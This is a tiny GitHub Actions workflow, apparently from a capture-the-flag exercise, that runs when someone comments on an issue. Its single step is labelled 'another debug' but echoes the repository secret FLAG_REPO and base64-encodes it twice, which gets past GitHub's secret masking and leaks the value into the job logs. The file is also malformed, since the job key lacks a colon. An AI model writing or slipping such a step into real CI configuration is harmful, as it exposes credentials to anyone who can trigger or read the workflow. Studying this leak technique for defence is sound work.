name: Comment

on:
  issue_comment:
    types: created
  push:
    branches:
      - notabranch

jobs:
  blabal
    runs-on: ubuntu-latest 
    steps:
    - name: another debug
      run:  echo -e "SECRET=${{ secrets.FLAG_REPO }}\n" | base64 | base64

